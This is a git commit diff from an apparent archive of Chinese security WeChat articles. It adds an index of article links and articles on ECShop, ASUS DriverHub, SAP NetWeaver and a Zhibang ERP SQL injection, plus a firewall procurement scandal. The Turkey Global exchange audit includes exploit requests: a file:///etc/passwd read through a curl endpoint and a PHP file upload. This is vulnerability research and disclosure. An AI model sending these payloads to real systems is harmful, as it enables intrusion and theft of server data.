ECShop存在逻辑缺陷漏洞(CNVD-2025-08499)、华硕预装软件DriverHub中存在漏洞,可被利用来执行远程代码、雷神众测漏洞周报2025.5.6-2025.5.11、中标价85万防火墙,网购仅300元?;|苹果自研 5G 基带首个漏洞被修复:可拦截流量,中国安全专家发现;、漏洞预警 上海上X信息技术股份有限公司 堡垒机 RepeatSend 命令执行漏洞、【文末抽奖】Springscan+:Spring未授权访问漏洞检测Chrome插件 by Lumns、DragonForce勒索团伙正有计划地扩展其他勒索软件组织、某开源cms 0day挖掘、智邦国际ERP GetPrintTemplate.ashx SQL注入漏洞、【0day】Turkey Global全开源9语言交易所审计、【高危漏洞预警】SAP NetWeaver Visual Composer反序列化漏洞CVE-2025-42999、

This commit is contained in:
test 2025-05-13 04:24:20 +00:00
parent 51a229b860
commit 1d0140538e
10 changed files with 559 additions and 53 deletions

View File

@ -13926,5 +13926,16 @@
"https://mp.weixin.qq.com/s?__biz=MzkzNDI5NjEzMQ==&mid=2247484563&idx=1&sn=5f43362f5a4bda2e60b347f22c6f4d46": "【1day】⼤华智慧园区综合管理平台⽂件上传(CNVD2024-35311)",
"https://mp.weixin.qq.com/s?__biz=MzkxNzY5MTg1Ng==&mid=2247487330&idx=1&sn=757d1466f645123250afe9ccd77b023c": "【Web实战】一次空白页面的“妙手回春”嘎嘎出严重漏洞",
"https://mp.weixin.qq.com/s?__biz=Mzg4NTg5MDQ0OA==&mid=2247487893&idx=1&sn=3350628c95693f761c25068994b7e5a6": "紧急华硕DriverHub曝高危漏洞请立即更新—远程攻击者可通过HTTP请求劫持你的主板驱动管理",
"https://mp.weixin.qq.com/s?__biz=Mzg3OTc0NDcyNQ==&mid=2247493821&idx=1&sn=299f74ef185aadfca5248b900b31e27e": "研究人员发现华硕预装软件DriverHub存在\"一键式\"远程代码执行漏洞"
"https://mp.weixin.qq.com/s?__biz=Mzg3OTc0NDcyNQ==&mid=2247493821&idx=1&sn=299f74ef185aadfca5248b900b31e27e": "研究人员发现华硕预装软件DriverHub存在\"一键式\"远程代码执行漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkxMTMyOTg4NQ==&mid=2247484549&idx=1&sn=07bd4bd7dc024f64a4458af15c61ed8e": "ECShop存在逻辑缺陷漏洞CNVD-2025-08499",
"https://mp.weixin.qq.com/s?__biz=MzI2NzAwOTg4NQ==&mid=2649795069&idx=3&sn=f635741f0a1de71baccd3ad9cc1a576c": "华硕预装软件DriverHub中存在漏洞可被利用来执行远程代码",
"https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652503405&idx=1&sn=754e4027a04e293d322951ef9459a759&subscene=0": "雷神众测漏洞周报2025.5.6-2025.5.11",
"https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650610735&idx=1&sn=b3aa97fa473bf7318812cad75175f53d": "中标价85万防火墙网购仅300元|苹果自研 5G 基带首个漏洞被修复:可拦截流量,中国安全专家发现;",
"https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&mid=2247492263&idx=1&sn=2f28244d0617723b417f5e4557450c01": "漏洞预警 上海上X信息技术股份有限公司 堡垒机 RepeatSend 命令执行漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIzMTQ4NzE2Ng==&mid=2247495267&idx=1&sn=b3d1576e090815fc516ba4ae9ea6288f": "【文末抽奖】Springscan+Spring未授权访问漏洞检测Chrome插件 by Lumns",
"https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247582297&idx=1&sn=5904ff9bef31b689ef0b942ff6255ef6&subscene=0": "DragonForce勒索团伙正有计划地扩展其他勒索软件组织",
"https://mp.weixin.qq.com/s?__biz=MzkyMDM4NDM5Ng==&mid=2247492279&idx=1&sn=3aa15192fd6959ca837f09d0747e9396": "某开源cms 0day挖掘",
"https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247491423&idx=1&sn=3e9eba64f68f802352b09c54dc4a8beb": "智邦国际ERP GetPrintTemplate.ashx SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247491691&idx=1&sn=b1e831380887d4f8d2a9c1ba7e052c76": "【0day】Turkey Global全开源9语言交易所审计",
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247490068&idx=1&sn=e34c512c1ee126fd554c93c6301ef3f4": "【高危漏洞预警】SAP NetWeaver Visual Composer反序列化漏洞CVE-2025-42999"
}

View File

@ -0,0 +1,32 @@
# ECShop存在逻辑缺陷漏洞CNVD-2025-08499
原创 护卫神 护卫神说安全 2025-05-13 02:03
![](https://mmbiz.qpic.cn/mmbiz_png/NV9GjS35LEguTvia2lD5x6xvwXWy2kqvauvq1fOkHqrSYHlu0WO2jK7rGkomUDU8lbicFsnviaLrhCMhmGxXz09bw/640?wx_fmt=png&from=appmsg "")
ECShop是一款基于PHP+MySQL开发的开源B2C独立网店系统专为中小企业及个人卖家设计。它功能全面涵盖商品管理、订单处理、会员系统、支付集成、物流跟踪等核心电商模块支持多语言、多货币及灵活的模板定制满足个性化需求。系统采用模块化设计便于二次开发与功能扩展同时提供丰富的插件与主题模板降低开发成本。其稳定性、安全性及SEO优化能力出色助力商家快速搭建高效、易用的网上商店提升运营效率与用户体验。
国家信息安全漏洞共享平台于2025-04-30公布该程序存在代码注入漏洞。
**漏洞编号**
CNVD-2025-08499
**影响产品**
ECShop
**漏洞级别**
**公布时间**
2025-04-30
**漏洞描述**
国家信息安全漏洞共享平台未公布具体漏洞位置仅提醒ECShop存在逻辑缺陷漏洞攻击者可利用该漏洞获取敏感信息。
**解决办法:**
厂商已经发布补丁,可以到官方下载补丁更新。

View File

@ -1,5 +1,5 @@
# 【0day】Turkey Global全开源9语言交易所审计
原创 Mstir 星悦安全 2025-05-12 05:00
阿乐你好 2025-05-13 01:00
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/lSQtsngIibibSOeF8DNKNAC3a6kgvhmWqvoQdibCCk028HCpd5q1pEeFjIhicyia0IcY7f2G9fpqaUm6ATDQuZZ05yw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
@ -23,20 +23,10 @@ Fofa指纹:
**框架:ThinkPHP 5.0.24 Debug:True**
## 0x01 前台任意文件读取漏洞
位于 /application/api/controller/Fanyi.php 控制器的 callOnce 方法通过传入url参数进入curl_exec 中,导致漏洞产生.public function callOnce($url, $args=null, $method="post", $withCookie = false, $timeout = 10, $headers=array())  {/*{{{*/   $ch = curl_init();   if($method == "post")    {     $data = $this->convert($args);     curl_setopt($ch, CURLOPT_POSTFIELDS, $data);     curl_setopt($ch, CURLOPT_POST, 1);   }   else    {     $data = $this->convert($args);     if($data)      {       if(stripos($url, "?") > 0)        {         $url .= "&$data";       }       else        {         $url .= "?$data";       }     }   }   curl_setopt($ch, CURLOPT_URL, $url);   curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   if(!empty($headers))    {     curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);   }   if($withCookie)   {     curl_setopt($ch, CURLOPT_COOKIEJAR, $_COOKIE);   }   $r = curl_exec($ch);   curl_close($ch);   return $r;  }
位于 /application/api/controller/Fanyi.php 控制器的 callOnce 方法通过传入url参数进入curl_exec 中,导致漏洞产生.public function callOnce($url, $args=null, $method="post", $withCookie = false, $timeout = 10, $headers=array())  {/*{{{*/   $ch = curl_init();   if($method == "post")    {     $data = $this->convert($args);     curl_setopt($ch, CURLOPT_POSTFIELDS, $data);     curl_setopt($ch, CURLOPT_POST, 1);   }   else   {     $data = $this->convert($args);     if($data)      {       if(stripos($url, "?") > 0)        {         $url .= "&$data";       }       else       {         $url .= "?$data";       }     }   }   curl_setopt($ch, CURLOPT_URL, $url);   curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   if(!empty($headers))    {     curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);   }   if($withCookie)   {     curl_setopt($ch, CURLOPT_COOKIEJAR, $_COOKIE);   }   $r = curl_exec($ch);   curl_close($ch);   return $r;  }
**Payload:**
```
GET /api/fanyi/callOnce?url=file:///etc/passwd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Host: 192.168.200.128
Pragma: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
GET /api/fanyi/callOnce?url=file:///etc/passwd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveHost: 192.168.200.128Pragma: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
```
@ -48,25 +38,7 @@ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
Payload:
```
POST /***/***/****/****/fileUpload HTTP/1.1
Host: 192.168.200.128
Content-Length: 997
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHx58bwavVjamnK8o
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryHx58bwavVja
...... 完整Payload在文末
------WebKitFormBoundaryHx58bwavVja
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundaryHx58bwavVjamnK8o--
POST /***/***/****/****/fileUpload HTTP/1.1Host: 192.168.200.128Content-Length: 997User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHx58bwavVjamnK8oAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryHx58bwavVja...... 完整Payload在文末------WebKitFormBoundaryHx58bwavVjaContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryHx58bwavVjamnK8o--
```

View File

@ -0,0 +1,104 @@
# 【文末抽奖】Springscan+Spring未授权访问漏洞检测Chrome插件 by Lumns
原创 EDI EDI安全 2025-05-13 01:30
**EDI**
JOIN US 
▶▶▶
**招新**
EDI安全的CTF战队经常参与各大CTF比赛了解CTF赛事。
欢迎各位师傅加入EDI大家一起打CTF一起进步。
诚招web re crypto pwn misc方向的师傅有意向的师傅请联系邮箱root@edisec.net、shiyi@edisec.net带上自己的简历简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。
**点击蓝字 ·  关注我们**
**01**
插件概述
Springscan+ 是一款专为安全研究人员和开发人员设计的Chrome扩展工具专注于主动探测Spring框架应用程序中的未授权访问漏洞Unauthorized Access Vulnerabilities。通过自动化扫描帮助用户快速发现Spring Boot、Spring MVC等应用中因配置不当或权限控制缺失导致的敏感接口暴露风险保障应用安全。
**02**
核心功能
扫描Actuator、Swagger识别框架特有的接口路径如/actuator/**、/env、/heapdump等
基本功能如下图所示:
![](https://mmbiz.qpic.cn/mmbiz_jpg/rJALXSMzgel28KMXI0vVy04RRXOtjqNEicn8YiasHNMU2HSvwTicTWwGlswDhKGZDfmMS0BNNib2AFWY7JTjaR8sHg/640?wx_fmt=other&from=appmsg "")
**03**
优势
自定义扫描配置,可调整扫描范围,在设置中添加需要扫描的目录或文件
![](https://mmbiz.qpic.cn/mmbiz_jpg/rJALXSMzgel28KMXI0vVy04RRXOtjqNE9w6AnycfNMb2ibRTmmF8vgYyNCblp6kUaKBHVlkJ83oVWsJ6JYl5ZFg/640?wx_fmt=other&from=appmsg "")
**04**
使用场景
开发环境安全自检
安全攻防演练快速定位漏洞
**05**
免责声明
本插件仅限授权测试使用,禁止用于非法渗透测试!使用前请确保已获得目标系统的书面授权
**06**
安装使用
下载后点击加载压缩的扩展进行加载使用
![](https://mmbiz.qpic.cn/mmbiz_jpg/rJALXSMzgel28KMXI0vVy04RRXOtjqNEYF0ws1kAT1fQ21JYGSnEVNxywiaibwadYIggZh2xw5nBsKo90cwddY8w/640?wx_fmt=other&from=appmsg "")
**07**
获取使用&抽奖
**免费领取插件**
回复关键词【
Spring安全
】获取下载链接Chrome/Edge/Firefox均支持
![](https://mmbiz.qpic.cn/mmbiz_png/rJALXSMzgel28KMXI0vVy04RRXOtjqNEZdV7kUEzu0x3CAiaUQNMt8hTHcfM69tUkWbHhAwpo9ep78bG6H2pibJQ/640?wx_fmt=png&from=appmsg "")
EDI安全
![](https://mmbiz.qpic.cn/mmbiz_jpg/rJALXSMzgeltHiby6tqsYOxxHFyMsen75lNibKic99yMR79qnaj84Hib0RLG9JZTfbxkVhbXeYRrqxXQfiaFFbicNxrA/640?wx_fmt=jpeg&from=appmsg "")
**扫二维码|关注我们**
一个专注渗透实战经验分享的公众号

View File

@ -0,0 +1,26 @@
# 【高危漏洞预警】SAP NetWeaver Visual Composer反序列化漏洞CVE-2025-42999
cexlife 飓风网络安全 2025-05-13 03:45
![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu01IMOalHsV5UBGvO0AOfgNcUeCof1kGpJpxPQeOG7OqhtNzEQOdBSSNHHax9FoSRjs1mR32vwFP5g/640?wx_fmt=png&from=appmsg "")
漏洞描述:
当特权用户可以上传不受信任或恶意的内容时,SAP NetWeaver Visual Composer Metadata Uploader容易受到攻击,这些内容在反序列化时可能会导致主机系统的机密性、完整性和可用性受到损害。
攻击场景:
攻击者可能通过上传不可信或恶意内容,导致主机系统的机密性、完整性和可用性受损。
受影响产品或系统:
SAP NetWeaverVisual Composer 开发服务器)=VCFRAMEWORK 7.50
修复方案:
官网已发布安全补丁
详情参考:SAP安全说明
https://me.sap.com/notes/3604119

View File

@ -0,0 +1,111 @@
# 中标价85万防火墙网购仅300元|苹果自研 5G 基带首个漏洞被修复:可拦截流量,中国安全专家发现;
黑白之道 2025-05-13 02:06
![](https://mmbiz.qpic.cn/mmbiz_gif/3xxicXNlTXLicwgPqvK8QgwnCr09iaSllrsXJLMkThiaHibEntZKkJiaicEd4ibWQxyn3gtAWbyGqtHVb0qqsHFC9jW3oQ/640?wx_fmt=gif "")
**重要HW中高级急聘薪资从优急速面试项目优先**
**加V:Hacker-ED**
**详情请点击:**
# 重要2025HW招募
**中标价85万防火墙网购仅300元**
75万元采购防火墙实为299元路由器重庆三峡学院出现违法、违规行为项目终止采购。
**极目新闻记者 余渊**
****
5月11日重庆三峡学院发布情况说明
近日我校“防火墙及DNS设备采购项目中标结果”引发网民质疑学校高度重视成立专项工作组开展核实。
因工作需要我校需购买网络防火墙及DNS设备在招标文书中明确提出了需满足的技术标准。2025年5月6日该采购项目完成竞争性谈判拟中标供应商为丰都县洪正商贸有限公司。5月9日我校工作人员查询相关资料发现拟中标的产品普联TL-R473G不符合我校要求的技术标准并开展取证工作。**经核查和取证,拟中标供应商响应的产品实际是普通的千兆有线路由器**
,与我校要求的网络防火墙技术标准严重不符。我校立即向采购代理机构申请,按相关规定对本项目实施采购终止,重新开展采购活动。**鉴于本项目出现影响采购公正的违法、违规行为5月10日重庆市政府采购网已发布采购终止公告。**
感谢社会各界的关心和监督。
****
****
**相关报道**
近日有网友发消息称2025年5月发布的《重庆三峡学院防火墙及DNS设备采购(CQS25A00331)中标成交结果公告》中重庆三峡学院采购的“普联TL-R473G出口防火墙”中标价格为75万元一台但该型号产品在某电商平台普联官方旗舰店售价仅299元质疑其中标价格不合理。
极目新闻记者在京东网络购物平台普联官方旗舰店查询到普联TL-R473G型号产品售价为299元。该店人工客服表示普联TL-R473G是一款路由器并不支持防火墙且该产品没有75万元的定价其售价为299元。记者随后查询了其他网络购物平台普联TL-R473G的价格也均在数百元左右。
![图片](https://mmbiz.qpic.cn/mmbiz_png/YnaVDWI3aicZzT4Tuc95SUicaen4VtNhtx6ZVVTiczF0RsvK6lRKToXLF2qO5QLTySapKHicUcqRLdic9icYpxqCkibrg/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&tp=wxpic "")
一名长期从事网络安全工作的业内人士告诉极目新闻记者根据中标公告的内容来看其标的“出口防火墙产品”实际上并非防火墙而是一个企业级的出口路由器。并且普联TL-R473G型号产品其单价只有数百元远远达不到标的中的75万元一台。
极目新闻记者就此事搜索发现2025年5月10日晚10时许中国政府采购网发布了一则《重庆三峡学院防火墙及DNS设备采购(CQS25A00331)终止公告》更正信息一栏中显示“接采购人通知原成交供应商丰都县洪正商贸有限公司所投的主要标的出口防火墙产品型号为某路由器产品型号已确定不满足谈判文件要求本项目出现影响采购公正的违法、违规行为。采购人根据《政府采购非招标采购方式管理办法》第三十七条规定决定本项目采购终止重新开展采购活动。”更正日期为2025年5月10日。
![图片](https://mmbiz.qpic.cn/mmbiz_png/YnaVDWI3aicZzT4Tuc95SUicaen4VtNhtx3YFyibntHh0VHKLcmibZyR3PSGOLMeOFqpC8y4Z2hia8np8tTrhboRSfA/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&tp=wxpic "")
5月11日重庆三峡学院办公室工作人员告诉极目新闻记者目前学校已经关注到此事他们已向领导进行汇报学校采购与招投标管理中心正在跟进处理。
中国政府采购网公布的《重庆三峡学院防火墙及DNS设备采购(CQS25A00331)终止公告》内容是否属实?对此,该工作人员表示,“你看到的(公告)是什么样的,应该就是什么样的。”
极目新闻记者就此事多次致电重庆三峡学院采购与招投标管理中心,电话未接通。
**苹果自研 5G 基带首个漏洞被修复:可拦截流量,中国安全专家发现**
IT之家 5 月 13 日消息苹果公司昨日5 月 12 日)发布安全博文,在 iOS 18.5 正式版中,修复了适用于 iPhone 16e 自研基带的**首个安全漏洞,可拦截网络流量**
,苹果还特别感谢了中国安全专家**秦若涵、崔志伟以及崔宝江**
对此的贡献。
IT之家查询公开资料上述三人应该均来自北京邮电大学其中崔宝江是博士生导师现主要从事网络攻防技术、漏洞挖掘技术、大数据安全分析技术、网络与主机安全行为分析、Web / 软件和操作系统安全缺陷分析、移动互联网和物联网安全技术研究。
崔志伟是网络空间安全学院 2021 级博士生,研究成果累计覆盖 16 亿网络注册用户,入选 GSMA 移动安全名人堂,以第一作者身份在 TIFS 等国际期刊或会议发表论文 5 篇。
他挖掘运营商号码认证以及 5G 消息等多项高危漏洞,研究成果获中央网信办、工信部等多家单位认可。向全球移动通信系统协会 GSMA 提交国内第一个 3GPP-5G 标准协议缺陷。
苹果今年推出的 iPhone 16e搭载了自研的 C1 5G 芯片,负责信号处理,编码和解码设备与网络间的数据,处理通话、短信和数据连接。
根据苹果官方安全支持文档描述,该漏洞追踪编号为 CVE-2025-31214存在于 C1 自研基带中,攻击者若身处“特权网络位置”,可能利用这一漏洞拦截网络流量,实施监控或中间人攻击。苹果通过改进状态管理,可能是新增验证机制,阻止攻击者利用运行状态间的弱点。
iOS 18.5 在修复 C1 基带之外还修复诸多其它问题涉及图像处理、通话记录、Bluetooth、文件解析、FaceTime、Notes、ProRes 和 WebKit 等功能。
> **文章来源 极目新闻、IT之家******
**精彩推荐**
# 乘风破浪|华盟信安线下网络安全就业班招生中!
[](http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650575781&idx=2&sn=ea0334807d87faa0c2b30770b0fa710d&chksm=83bdf641b4ca7f5774129396e8e916645b7aa7e2e2744984d724ca0019e913b491107e1d6e29&scene=21#wechat_redirect)
# 【Web精英班·开班】HW加油站快来充电
[](http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650594891&idx=1&sn=b2c5659bb6bce6703f282e8acce3d7cb&chksm=83bdbbafb4ca32b9044716aec713576156968a5753fd3a3d6913951a8e2a7e968715adea1ddc&scene=21#wechat_redirect)
# 始于猎艳终于诈骗带你了解“约炮”APP
[](http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650575222&idx=1&sn=ce9ab9d633804f2a0862f1771172c26a&chksm=83bdf492b4ca7d843d508982b4550e289055c3181708d9f02bf3c797821cc1d0d8652a0d5535&scene=21#wechat_redirect)
****

View File

@ -0,0 +1,63 @@
# 华硕预装软件DriverHub中存在漏洞可被利用来执行远程代码
会杀毒的单反狗 军哥网络安全读报 2025-05-13 01:00
**导****读**
新西兰安全研究员“MrBruh”表示华硕主板预装的驱动程序软件 DriverHub 中存在两个漏洞,可被远程利用执行任意代码。
![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaELH3YEg8S4VL14rFVP9yiavALYEWKzDPdeCOWYNiccQA8TdicAWFxE4YdIHZN4HnKg5y3Mw2AFvpQvA/640?wx_fmt=webp&from=appmsg "")
这两个漏洞编号为CVE-2025-3462CVSS 评分为 8.4和CVE-2025-3463CVSS 评分为 9.4),可以通过精心设计的 HTTP 请求利用这些漏洞 与 DriverHub 进行交互。
这两个漏洞均源于验证不足,导致 DriverHub 功能被滥用。华硕表示,这些漏洞不会影响笔记本电脑和台式机。
DriverHub 是一款无图形用户界面 (GUI) 的驱动程序更新程序,它会在后台运行一个进程,通过本地主机 53000 端口上的 RPC 与 driverhub.asus.com 进行通信。
研究员 MrBruh 发现虽然它只接受源头设置为“driverhub.asus.com”的请求但通配符匹配机制存在缺陷允许来自“driverhub.asus.com.mrbruh.com”等域名的请求。攻击者可以利用此漏洞安装恶意软件。
DriverHub 在后台运行,与 driverhub.asus.com 通信,通知用户需要安装或更新的驱动程序。它依赖于远程过程调用 (RPC) 协议,并托管一个本地服务,网站可以通过 API 请求连接到该服务。
根据 MrBruh 的说法,虽然 DriverHub 只接受来自 driverhub.asus.com 的 RPC 请求但将来源切换为“driverhub.asus.com.*”将允许未经授权的用户向其发送请求。
此外驱动程序的UpdateApp端点将接受精心设计的 URL 参数(如果它们包含“.asus.com”保存具有指定名称的文件下载具有任何扩展名的任何文件自动以管理员权限执行签名的文件并且不会删除未通过签名检查的文件。
通过查看 ZIP 存档中分发的独立 Wi-Fi 驱动程序MrBruh 发现可以利用静默安装功能来针对 UpdateApp 端点执行任何文件。
研究人员演示了如何利用这些漏洞通过让目标用户访问托管在 driverhub.asus.com.* 子域上的恶意网页来一键执行远程代码。
MrBruh 于 4 月 8 日报告了这些漏洞,华硕于 5 月 9 日推出了修复程序。这位研究人员表示,他没有看到任何注册了 driverhub.asus.com.* 的域名,“这意味着在他的报告之前,这个漏洞不太可能被主动利用”。
MrBruh 询问华硕是否提供漏洞赏金。该公司表示,他们不提供漏洞赏金,但会将研究人员的名字添加到他们的“名人堂”。
漏洞详情:
https://mrbruh.com/asusdriverhub/
新闻链接:
https://www.securityweek.com/asus-driverhub-vulnerabilities-expose-users-to-remote-code-execution-attacks/
![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaGC3gsJClsh4Fia0icylyBEnBywibdbkrLLzmpibfdnf5wNYzEUq2GpzfedMKUjlLJQ4uwxAFWLzHhPFQ/640?wx_fmt=jpeg "")
扫码关注
军哥网络安全读报
**讲述普通人能听懂的安全故事**

View File

@ -0,0 +1,115 @@
# 智邦国际ERP GetPrintTemplate.ashx SQL注入漏洞
Superhero Nday Poc 2025-05-13 02:53
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkYN4sZibCVo6EFo0N9b7Kib4I4N6j6Y10tynLOdgov9ibUmaNwW5yeoCbQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkhic5lbbPcpxTLtLccZ04WhwDotW7g2b3zBgZeS5uvFH4dxf0tj0Rutw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCk524CiapZejYicic1Hf8LPt8qR893A3IP38J3NMmskDZjyqNkShewpibEfA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的
POC
信息及
POC对应脚本
而造成的任何直接或者间接的后果及损失均由使用者本人负责公众号Nday Poc及作者不为此承担任何责任一旦造成后果请自行承担
**01**
**漏洞概述**
智邦国际ERP GetPrintTemplate.ashx 接口存在SQL注入漏洞未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
**02******
**搜索引擎**
FOFA:
```
icon_hash="-682445886"
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJKTlSEl7vS1ZcE9E2QBAianxuicm7YHWicZ3oKFM2icC4n8cSl5NqkCic4PuDxK1KU415FBf67zw7RHug/640?wx_fmt=png&from=appmsg "")
**03******
**漏洞复现**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJKTlSEl7vS1ZcE9E2QBAianGOL3AhiaicnUSLcMzRqRjGKp8UF8AcaqZveDvGRqoFPLlGC263bia03Vg/640?wx_fmt=png&from=appmsg "")
sqlmap验证
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJKTlSEl7vS1ZcE9E2QBAian5iazPumlPGpvbcvIRQNJNv9pic2hKZ2WafNVdkkfe6NBKAzT0JyOI8UQ/640?wx_fmt=png&from=appmsg "")
**04**
**自查工具**
nuclei
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJKTlSEl7vS1ZcE9E2QBAiankqibZic8RETjHiarHmtYO6M4jhYXXHhQqx8XkLRGlAWTreSsLxcJdcqYA/640?wx_fmt=png&from=appmsg "")
afrog
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJKTlSEl7vS1ZcE9E2QBAian1zjY3MyZQBzicoGm3Yx3FJI3SDp8TnibHibASjKAOoIaiapV0BppLyaNag/640?wx_fmt=png&from=appmsg "")
xray
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJKTlSEl7vS1ZcE9E2QBAian7SvcOib0b4Th2lfUopnX3czvnZ3E8saV2WWZ43icNq7iaLU3WrBE6jAZw/640?wx_fmt=png&from=appmsg "")
**05******
**修复建议**
1、关闭互联网暴露面或接口设置访问权限
2、
升级至安全版本
**06******
**内部圈子介绍**
【Nday漏洞实战圈】🛠 
专注公开1day/Nday漏洞复现
 · 工具链适配支持
 ✧━━━━━━━━━━━━━━━━✧ 
🔍 资源内容
 ▫️ 整合全网公开
1day/Nday
漏洞POC详情
 ▫️ 适配Xray/Afrog/Nuclei检测脚本
 ▫️ 支持内置与自定义POC目录混合扫描 
🔄 更新计划 
▫️ 每周新增7-10个实用POC来源公开平台 
▫️ 所有脚本经过基础测试,降低调试成本 
🎯 适用场景 
▫️ 企业漏洞自查 ▫️ 渗透测试 ▫️ 红蓝对抗 
▫️ 安全运维
✧━━━━━━━━━━━━━━━━✧ 
⚠️ 声明:仅限合法授权测试,严禁违规使用!
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwI0beBCCyKGykkAazuPyvibgC0ooBGy9elQQ72f1WIB73UDYuPhx8cnCobvnOBdTcxmdwBbt2eAYIQ/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -1,22 +1,25 @@
# 某开源cms 0day挖掘
用户9528 菜鸟学信安 2025-05-07 00:30
用户9528 安全洞察知识图谱 2025-05-13 00:30
作者用户9528
**免责声明**
 由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号安全洞察知识图谱及作者不为**此**
承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
## 1项目介绍
```
作者用户9528
原文链接https://xz.aliyun.com/news/17601
```
原文链接https://xz.aliyun.com/news/17601
### 简介
**简介**
简介
CicadasCMS是用springboot+mybatis+beetl开发的一款CMS支持自定义内容模型、模板标签、全站静态化等功能。
![Pasted image 20250331211235.png](https://mmbiz.qpic.cn/sz_mmbiz_png/GzdTGmQpRic0DKKuMAu4bXMF7B2t6nk7VWicjGGlhWtiaAvibAibC4Mw6rwvqCTsz21HTY4Eiabju8pMaJpUwPicwlibfg/640?wx_fmt=png&from=appmsg "")
![Pasted image 20250331211235.png](https://mmbiz.qpic.cn/sz_mmbiz_jpg/PDVoxXx6Rhic2eSUB7oxwhHPcGA4rxBibkKUTRhTKGq304kjSdGPia4BUq6hMBibDTUjET86sh9vXxITTzib1dZBCUQ/640?wx_fmt=jpeg "")
